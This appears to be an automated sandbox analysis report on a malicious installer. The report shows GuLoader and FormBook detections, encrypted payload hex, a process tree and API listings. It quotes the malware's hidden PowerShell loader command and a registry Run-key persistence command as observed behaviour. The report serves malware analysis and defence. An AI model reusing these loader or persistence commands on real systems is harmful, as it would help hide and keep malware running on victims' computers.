2024-05-23 13:21:33 UTC	297	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 23 May 2024 07:49:30 GMT Accept-Ranges: bytes ETag: "ff6c9cbee5acda1:0" Server: X-Powered-By: ASP.NET X-Powered-By-Plesk: PleskWin Date: Thu, 23 May 2024 13:22:29 GMT Connection: close Content-Length: 269376
2024-05-23 13:21:33 UTC	16087	IN	Data Raw: cc 89 e5 96 6a 22 6e 5f e9 62 7a 94 54 fb c0 7f e3 9e 14 9c aa 60 78 86 6f 92 9c 69 d3 4a 83 c4 f2 09 95 c4 08 3a 66 33 66 7f e2 12 a1 06 80 db 55 df e3 2e 32 ed e2 5b 6f 63 f6 81 88 41 95 1d 19 32 a6 b3 ff c7 6c f2 c9 14 1e ce d0 ea 97 f6 f9 50 8e e2 a7 e6 21 75 15 d6 bd 00 ee 82 3e 4d fd 0b 02 f9 7e 30 8f c4 ec 16 32 7d 12 13 b0 14 7b 90 05 0a 4e 3f ab 03 fa 0b 24 3a fc 9f 27 41 6d ab d3 16 5b a6 1a 0e 2f 50 62 88 41 35 c7 21 56 22 4e ee 02 91 f8 86 58 ae 17 38 6e dd c6 f3 a0 d6 c4 13 04 8c 2c 42 62 58 42 bf f0 c5 85 7f 26 3e b4 6d d1 9c a8 46 2e e3 5d 81 c3 48 d3 50 f2 ef a3 ce 16 1e b2 04 f3 34 c3 4e da 96 77 de d7 de 8e ae cb 7b a9 7d 6e bb 0e 08 07 e4 b6 ea 10 95 b0 f7 73 3f 26 46 ca c0 f1 61 cd 6f 0a c8 69 af 3a 7c 31 b0 c5 2b f5 70 15 53 20 3a 1a Data Ascii: j"n_bzT`xoiJ:f3fU.2[ocA2lP!u>M~02}{N?$:'Am[/PbA5!V"NX8n,BbXB&>mF.]HP4Nw{}ns?&Faoi:\|1+pS :
2024-05-23 13:21:33 UTC	16384	IN	Data Raw: d7 4c 99 11 ad cc 45 d1 85 fe 21 c1 65 1a ff 07 97 a7 55 c1 db b0 2e 5a 95 22 6c d3 09 31 72 34 bc d6 57 38 8f 6f 2c f1 95 12 d8 e6 b2 4e 70 c8 dd 9a df d5 8f 59 b7 d0 e2 00 74 ee 2a b6 7d 5a 19 a4 6d 6a be 8e 5b 90 df 4c 9c 1c 98 5d 9c cd 7f 2a 72 80 fb 9a cd c1 b5 5c 57 82 63 ea 46 55 53 09 7c c4 cb 98 37 ca a7 2d ba 2c 4f 6a 3a 30 18 5c 8b 87 d2 be 03 42 f6 0a 3e f7 c2 32 22 ba 91 1a 6a d5 1a b0 1c c5 66 88 13 f5 88 80 71 27 d2 cf 1b f7 d7 3b 61 37 2e fe eb e9 bd c1 d7 dd 10 84 74 e5 d6 60 c8 5f ae 8f 80 33 c2 bb dd 1b 84 30 bb e3 96 63 a3 55 ab ce 26 73 6e d7 ab 1e ba dc 7f 12 03 5f 94 2b a9 67 77 32 8b a9 0f 1f c7 43 cc b0 51 f7 2f f2 35 d6 7c 57 cc b1 04 44 5d 3c 0a 1a 8b 60 2f 6a 2b c3 68 54 23 cc 31 3a bf 70 cf cf 5b e1 a2 2e d0 70 b3 3d d5 70 fb Data Ascii: LE!eU.Z"l1r4W8o,NpYt}Zmj[L]r\WcFUS\|7-,Oj:0\B>2"jfq';a7.t`_30cU&sn_+gw2CQ/5\|WD]<`/j+hT#1:p[.p=p
2024-05-23 13:21:33 UTC	16384	IN	Data Raw: 68 e3 78 04 f9 d0 ec e7 16 7e 04 00 ea 4f 3d a6 80 cc 73 94 37 fd 17 50 fb 0a 13 53 05 58 d9 24 97 76 e2 91 7e e2 ff a6 b2 be 1b 7c b3 14 73 ed 80 6a 06 ed 8f dc 3a b7 a0 64 a8 3c 2b 19 88 1b d2 3b 12 dd 5b a7 81 f7 5b e5 dc a0 65 ba b7 96 a4 ba 4b 7b 71 60 99 83 00 42 62 c0 9c f0 50 8b 75 91 40 7b 70 7b c9 81 4e ee 52 ec d2 ed b5 cb 26 09 4e 4f ce 4f 54 d4 3d ba 21 6a 04 eb 77 4a 92 26 36 d8 09 b9 a7 85 e3 ac 0c 06 84 24 c6 ba 60 4b 31 8a eb e8 af af 30 fb 94 ea dd 9a 70 19 cd 2e 6b ca 7e b7 c0 0a 9c e7 fc 72 33 d6 35 08 84 c3 17 aa 51 3c 85 a3 06 ca 75 e4 45 b8 15 07 c5 74 9e 99 57 f1 cd d2 86 94 1c 27 99 05 b7 bd f0 e6 74 1e a6 dd 5b b0 6d fe 07 26 64 e1 fc 2f f8 66 1d d8 42 78 bd b0 6b 75 b7 58 b8 b8 46 0e f1 62 80 f6 8b 6b c5 26 46 69 9f 2d 71 04 b8 Data Ascii: hx~O=s7PSX$v~\|sj:d<+;[[eK{q`BbPu@{p{NR&NOOT=!jwJ&6$`K10p.k~r35Q<uEtW't[m&d/fBxkuXFbk&Fi-q
2024-05-23 13:21:33 UTC	16384	IN	Data Raw: 07 a8 b7 bb 38 67 d3 61 d9 9d 8b 8d 37 61 6a e4 22 6d a4 99 e5 55 57 e9 ab e8 ce 6b 15 79 71 71 c0 27 75 32 3c 4b 28 85 4c cf d2 55 c9 ff e9 03 b7 09 69 0b 95 50 ea 4a 8d d9 35 ae 55 7c e4 dc 98 cb d7 d1 14 ea 2a 22 fd 3c c5 0f 62 09 1a eb d4 2e 42 af 31 18 e1 01 fd cd a0 e3 a1 bb bc d0 0b 9e a2 40 c1 20 6f a0 f2 ac 34 0b 1a 46 9a 48 14 1b 7a 05 cb 3f 39 6d 78 d0 c8 cf 07 e0 f5 81 bf bd 28 1c dd 1d 94 12 1d c2 44 fd 94 fa 3c 95 2e 7a 70 40 be 59 b0 48 7a 2f 02 2e e8 7b 47 6b e8 ee 78 41 a2 df 8d b4 f6 a7 5c ca 32 7d 4f 3a 42 94 60 90 19 9b c1 01 7c 33 36 31 f5 ce b9 78 b1 10 02 dc cc 12 a5 df 30 47 65 ce fe d7 ae 4f fd ee a4 ef 96 58 27 f5 a2 59 05 58 57 f1 26 1e 58 c4 ad 1b 0a fd 28 9f 9f 76 28 10 98 27 ff 91 80 76 35 b4 ee 85 57 14 8c c6 e8 48 78 c9 21 Data Ascii: 8ga7aj"mUWkyqq'u2<K(LUiPJ5U\|*"<b.B1@ o4FHz?9mx(D<.zp@YHz/.{GkxA\2}O:B`\|361x0GeOX'YXW&X(v('v5WHx!
2024-05-23 13:21:33 UTC	16384	IN	Data Raw: 2a 34 a4 3d 5e 7f f0 b0 a4 df 8b b6 91 25 47 d1 56 0d 50 9c 1b 12 01 d0 bd 43 4a a7 f9 6f 3d 08 44 32 86 f4 6c 95 25 21 94 a9 18 c0 b2 41 9b 5d c5 1d f1 fa 73 f2 a8 09 91 42 c7 c4 d9 9b 3d d5 d5 71 0f 48 00 0a 45 86 e2 f1 1c de 16 37 06 6d a2 46 17 ca 41 82 05 d0 4f da 9c 99 d2 06 1f d9 69 9f 61 2f a0 9b ba 5f 85 69 26 1f 87 90 f5 28 93 54 7b 24 49 42 35 5d ea a4 db bf 2e e5 ad ca af 7b 47 80 04 d4 db a5 84 77 c4 ba 52 fe 7a ac 60 ec 1d fa fe 93 a1 4e b0 90 08 d2 50 a1 6d e7 3b 47 98 74 8b 45 ff 60 69 c6 bb fa b6 16 a4 95 ea 37 2e ca ee b6 0a a0 2e 45 3d f8 dc 77 b7 58 75 db a9 78 7f 87 82 06 35 bc 8b 44 09 ee 12 1e ea 53 15 01 94 ae e5 34 85 40 c6 90 fe e3 63 19 38 0d 2a bb dc 2a 38 c1 85 90 db d1 c6 43 57 27 7d a8 1f 61 89 4e 59 b3 cf 7c 92 87 e9 a4 47 Data Ascii: 4=^%GVPCJo=D2l%!A]sB=qHE7mFAOia/_i&(T{$IB5].{GwRz`NPm;GtE`i7..E=wXux5DS4@c8*8CW'}aNY\|G
2024-05-23 13:21:33 UTC	16384	IN	Data Raw: dd 09 e2 83 59 48 85 4f dd 05 21 31 b1 58 ec 9e 21 e5 d1 6a fc bb d0 67 25 99 64 5c 4f 59 d8 7d a0 c2 24 cc 37 9a 0a ed 0b 4c b2 ff ab 6b 5b 15 e0 66 ec 8b e6 ee 3a 84 07 92 85 1c f1 9e 36 9c 4d f0 2f 73 5d 5c 67 be 3f 09 a4 89 2e 8d cd f8 d1 ea 53 8d ab f9 42 03 9d cb 5e 70 ae 50 be 2f 23 17 0e 4b db 45 84 2a 7f da bb 97 c2 f5 80 ac d9 a1 5c 09 99 1c c1 0a 42 a4 1f 58 ba 25 36 f6 04 4f 09 c0 27 e3 7c 34 97 54 b3 64 7b 89 f5 87 0b 8c f0 08 90 91 3e ec 34 ee 05 34 1c 54 da cc ae f2 9d 72 7b cd f2 ed b3 77 04 f8 1f 71 ca f0 ea 04 fd f7 61 74 8e a1 8e 9f 15 7d 09 93 ee 60 ac 73 0e f2 f3 2f 2c 6f 2c aa 0e 51 6e 80 e2 72 d3 46 d1 38 82 b1 e8 86 58 e8 3b 62 35 cb 31 be 29 96 aa 34 98 9f 58 e9 8c 4b bb 74 4f 56 31 91 47 60 ab c3 36 90 ba a5 dd 44 be 34 ac ed 7f Data Ascii: YHO!1X!jg%d\OY}$7Lk[f:6M/s]\g?.SB^pP/#KE*\BX%6O'\|4Td{>44Tr{wqat}`s/,o,QnrF8X;b51)4XKtOV1G`6D4
2024-05-23 13:21:34 UTC	16384	IN	Data Raw: a5 32 18 84 f8 96 12 54 46 e3 f6 3b 3d 01 ea e7 1f 03 1f a9 b6 2d e9 09 18 69 40 93 79 f4 15 52 73 e7 ac 52 22 80 19 e8 d5 0d 4f 48 ec 42 e9 05 9d 1d 95 b8 13 a5 cb ae 2c ce 44 39 b3 9b 3e 98 03 3c 1a bd 2d 9d e1 a7 6b 2e 64 21 86 01 2f 52 d0 48 7d 7c 9f ef b1 f8 18 df 53 f1 84 af 48 f4 0c 75 32 ba c0 b9 52 6a 79 10 11 43 1c 26 02 91 a7 bb fb 4b af cf ad 1a df de 79 8e 74 ac 18 3b 89 4b 28 2d 1e 4f fd af 50 9a a6 1e 98 83 81 88 f6 0d e3 c9 e9 92 fd 2d fc aa 15 d8 05 c1 4a 1d 39 70 bd 1f b3 a3 6e 3d 48 2d 45 bb 3e 2e 17 ba 0b 0e c4 ee a6 6c 31 72 2a b6 db 50 05 f5 57 07 25 85 8c 1b 90 d7 20 39 a8 fa bc c2 2c f6 8c a9 1a 1c 6f 2d 40 4a af fe ca bb 27 26 f2 58 d1 e4 03 e4 3e 78 81 88 5f ff f0 99 b2 d9 8b 1d 15 ef 3d 46 f1 bb 5a 9b 0a 18 37 e5 92 5e 6f c9 f0 Data Ascii: 2TF;=-i@yRsR"OHB,D9><-k.d!/RH}\|SHu2RjyC&Kyt;K(-OP-J9pn=H-E>.l1r*PW% 9,o-@J'&X>x_=FZ7^o
2024-05-23 13:21:34 UTC	16384	IN	Data Raw: de a4 14 43 ff 28 26 be de 0b 5b 1b ec 28 da dd be 70 eb f9 c7 a3 a7 82 18 ae 83 f4 b9 6a 49 ba 70 75 bf c2 84 f2 bd fc d4 3b ad ac bf 1e 24 a1 39 e8 66 f4 60 d5 f3 49 74 5d 0b 3f de 7c 04 04 09 9b f0 13 8c ed e8 67 66 72 92 4f b6 ac be 67 71 43 37 60 a0 f3 2c 81 f8 b6 61 1d 26 6a 07 a5 45 19 e5 62 a4 23 94 7a 87 8d 8e d5 05 ad 48 0a 42 e0 68 39 b9 8d 38 a1 10 ad 07 62 ed d0 48 6a d1 72 3f fe cb e0 cd 1d 3c c9 17 3e eb 98 b9 42 d8 59 39 bb d0 90 9a f5 0e 2e 79 fd dc 7e 8b 47 68 13 d3 59 5d 12 b3 ca 14 4e 40 c0 c0 9c d7 5a dc 6c 96 3b 98 59 c1 9f eb c6 3d e7 2c 04 f7 06 5b 29 8a 7c bd 75 3e 60 9f 03 11 0a a6 93 79 92 e8 26 6f ba 77 b1 54 8a 6a ca 9a 17 80 21 bb 02 52 21 7a 64 b8 d9 72 4f ec 76 23 26 e5 09 68 6c 51 59 21 d5 09 fd 8e a5 9e cb b7 35 a4 73 36 Data Ascii: C(&[(pjIpu;$9f`It]?\|gfrOgqC7`,a&jEb#zHBh98bHjr?<>BY9.y~GhY]N@Zl;Y=,[)\|u>`y&owTj!R!zdrOv#&hlQY!5s6
2024-05-23 13:21:34 UTC	297	IN	Data Raw: 4a 05 a7 ad ba 61 26 05 94 48 9a 31 ab 66 34 87 cc 80 24 a7 9a 3a e3 85 83 57 63 9c c8 ba ef fa 65 c7 ff e2 26 6f d9 37 96 d9 f0 7b 88 0c 9a 73 25 91 a8 d8 c7 d8 24 85 6f bc 95 ad d1 18 de 40 c4 1c 78 1c d7 99 be 9b ab 6b e9 8a 92 3e 07 b4 b7 8f d8 71 32 36 d6 9b f9 01 37 6a 8c 4d 61 b8 e7 c9 d6 ed 16 fe 85 8c b3 93 bc 6f 74 85 c2 dd 79 a2 88 54 18 32 1c cb 5f eb f8 da a1 3b db 23 1b 27 ba 87 f8 64 5f b9 f4 aa 2e 90 e6 ea 34 1c f4 99 43 af 11 2f 6c 59 6a df 93 a3 74 20 5e a4 b0 58 82 eb 01 1f b7 9b 8c 89 ff f3 a4 d2 ad 0d 4e 89 6d 2e 6d b8 21 22 d4 29 e0 d1 9d b2 29 ea dd 65 41 cb 61 a5 32 d4 67 0b c0 49 7b 34 69 2e 63 ee 2f 27 d9 c3 08 91 77 f8 63 31 e7 18 b6 c0 48 c7 79 f8 4f 85 21 a3 ad f7 11 7c a3 09 94 1e f5 6e 6f c3 d4 b8 23 ef 33 52 29 fc 07 92 ec Data Ascii: Ja&H1f4$:Wce&o7{s%$o@xk>q267jMaotyT2_;#'d_.4C/lYjt ^XNm.m!"))eAa2gI{4i.c/'wc1HyO!\|no#3R)
2024-05-23 13:21:34 UTC	16384	IN	Data Raw: bd d5 10 ad 82 68 b3 eb bf 70 35 be 13 de 4c 67 ec 9c 24 70 98 b2 95 f7 9e 1d c8 e9 05 89 f8 b8 d4 48 92 18 44 96 14 26 39 89 5a cf dd 01 38 62 4e df a6 c8 80 62 e0 6e 71 94 db 1d f5 3b ee e5 75 aa cb d3 d2 22 0e 46 6b 12 b3 58 9a 8b e9 46 79 8e bb 2e 48 be 79 8e ee 3a 21 1d 19 46 e7 8a 3d b9 d1 c7 7e 5d b4 12 af fc 89 51 1c de 4a 9f 93 25 fc 41 b8 40 94 fb 8c 1b ef c1 d4 11 7d 97 49 1e ef 87 12 75 4e 6d 5f 98 6d 6f 1c de bd 7d 15 ae a2 0e da ce f2 5a d1 eb 2f bd 8c d1 74 36 f5 ef 78 a0 81 0c 34 50 ab 3a f4 25 f1 a2 37 f2 cd 75 05 f9 7b 17 22 53 7d df a5 79 63 d3 bd 03 c6 d9 12 b7 b8 97 0e 53 33 c5 ba db 6e 6b d5 c8 d6 e5 b3 ea be e6 0a 29 db 66 f2 c0 40 f4 b2 fc 14 b7 b2 a7 e1 59 e5 e9 b9 bb de d0 92 e7 54 3f a0 45 47 92 fb b3 4b a5 3d 20 2d 4a f2 6f a9 Data Ascii: hp5Lg$pHD&9Z8bNbnq;u"FkXFy.Hy:!F=~]QJ%A@}IuNm_mo}Z/t6x4P:%7u{"S}ycS3nk)f@YT?EGK= -Jo

Target ID:	0
Start time:	09:19:54
Start date:	23/05/2024
Path:	C:\Users\user\Desktop\SwiftCopy_23052024.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SwiftCopy_23052024.exe"
Imagebase:	0x400000
File size:	558'280 bytes
MD5 hash:	F8A9B82D69416512778AD72015181036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:19:57
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Lommeregnerens178=Get-Content 'C:\Users\user\AppData\Roaming\fertiliseringer\Forbrug\Venstrehaandsarbejdet.Uns';$Industrivirksomhederne=$Lommeregnerens178.SubString(7349,3);.$Industrivirksomhederne($Lommeregnerens178)"
Imagebase:	0x260000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2198487086.0000000009E4D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:19:57
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:19:58
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	11:14:05
Start date:	23/05/2024
Path:	C:\Users\user\AppData\Local\Temp\Tabsgivende.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user~1\AppData\Local\Temp\Tabsgivende.exe"
Imagebase:	0x400000
File size:	558'280 bytes
MD5 hash:	F8A9B82D69416512778AD72015181036
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2375239145.00000000221D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.2375924840.0000000022840000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 26%, ReversingLabs Detection: 27%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	11:14:14
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Imagebase:	0x410000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	11:14:14
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	11:14:14
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Jordbesiddere% -windowstyle minimized $Udslettelser=(Get-ItemProperty -Path 'HKCU:\Oplukkelig\').Bractlets52;%Jordbesiddere% ($Udslettelser)"
Imagebase:	0x4a0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	11:14:29
Start date:	23/05/2024
Path:	C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe"
Imagebase:	0xf80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000017.00000002.2440680912.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	11:14:30
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\Magnify.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\SysWOW64\Magnify.exe"
Imagebase:	0xdd0000
File size:	516'096 bytes
MD5 hash:	4E5E8AB7FDC1933F43031B9CC13E7198
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	11:14:30
Start date:	23/05/2024
Path:	C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\wlanext.exe"
Imagebase:	0xf40000
File size:	78'336 bytes
MD5 hash:	0D5F0A7CA2A8A47E3A26FB1CB67E118C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.2439774111.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.2439886382.0000000000A40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.2436294055.00000000004C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	11:14:43
Start date:	23/05/2024
Path:	C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\sEJDEpyTeSxewOooeRadmzQMlGrduucsDOBgUXvZgbKQZOmzVCeuxoLKpsMjHmdscHscPwRhljcolWq\GjMghjdydYRuCpMLokUCwhVfwlj.exe"
Imagebase:	0xf80000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.2441331167.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	23.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	17.7%
Total number of Nodes:	1292
Total number of Limit Nodes:	35

Executed Functions

Function 00403248 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 366
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0040326D
GetVersion.KERNEL32 ref: 00403273
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004032A6
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004032E2
OleInitialize.OLE32(00000000), ref: 004032E9
SHGetFileInfoA.SHELL32(0079E508,00000000,?,00000160,00000000,?,00000006,00000008,0000000A), ref: 00403305
GetCommandLineA.KERNEL32(Trvlemund Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040331A
CharNextA.USER32(00000000,"C:\Users\user\Desktop\SwiftCopy_23052024.exe",00000020,"C:\Users\user\Desktop\SwiftCopy_23052024.exe",00000000,?,00000006,00000008,0000000A), ref: 00403356
GetTempPathA.KERNEL32(00000400,C:\Users\user~1\AppData\Local\Temp\,00000000,00000020,?,00000006,00000008,0000000A), ref: 00403453
GetWindowsDirectoryA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 00403464
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403470
GetTempPathA.KERNEL32(000003FC,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403484
lstrcatA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040348C
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 0040349D
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user~1\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004034A5
DeleteFileA.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004034B9

Part of subcall function 00406385: GetModuleHandleA.KERNEL32(?,?,?,004032BB,0000000A), ref: 00406397
Part of subcall function 00406385: GetProcAddress.KERNEL32(00000000,?), ref: 004063B2

Part of subcall function 0040380A: lstrlenA.KERNEL32(Execute: ,?,?,?,Execute: ,00000000,C:\Users\user\AppData\Roaming\fertiliseringer,1033,0079F548,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F548,00000000,00000002,771B3410), ref: 004038FA
Part of subcall function 0040380A: lstrcmpiA.KERNEL32(?,.exe), ref: 0040390D
Part of subcall function 0040380A: GetFileAttributesA.KERNEL32(Execute: ), ref: 00403918
Part of subcall function 0040380A: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\fertiliseringer), ref: 00403961
Part of subcall function 0040380A: RegisterClassA.USER32(007A26E0), ref: 0040399E

Part of subcall function 00403730: CloseHandle.KERNEL32(000002DC,00403567,?,?,00000006,00000008,0000000A), ref: 0040373B

OleUninitialize.OLE32(?,?,00000006,00000008,0000000A), ref: 00403567
ExitProcess.KERNEL32 ref: 00403588
GetCurrentProcess.KERNEL32(00000028,?,00000006,00000008,0000000A), ref: 004036A5
OpenProcessToken.ADVAPI32(00000000), ref: 004036AC
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004036C4
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004036E3
ExitWindowsEx.USER32(00000002,80040002), ref: 00403707
ExitProcess.KERNEL32 ref: 0040372A

Part of subcall function 00405709: MessageBoxIndirectA.USER32(0040A218), ref: 00405764

Strings

\Temp, xrefs: 0040346A
.tmp, xrefs: 004035AF
"C:\Users\user\Desktop\SwiftCopy_23052024.exe", xrefs: 00403320, 00403326, 004034DD
NSIS Error, xrefs: 0040330B
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00403448, 0040344D, 00403463, 0040346F, 0040347E, 0040348B, 00403497, 0040349F, 00403598, 004035A9, 004035B4, 004035C0, 004035CD, 004035DC, 0040368B
1033, xrefs: 004034B4
C:\Users\user\Desktop, xrefs: 004035BA, 004035BF, 004035EB
TEMP, xrefs: 00403498
C:\Users\user\AppData\Roaming\fertiliseringer\Lnforskellenes, xrefs: 00403544
TMP, xrefs: 004034A0
Low, xrefs: 00403486
C:\Users\user\AppData\Roaming\fertiliseringer, xrefs: 00403438, 00403539, 004035E3, 004035EC
Trvlemund Setup, xrefs: 00403310
UXTHEME, xrefs: 0040329A, 0040329F, 004032A5
SeShutdownPrivilege, xrefs: 004036BE
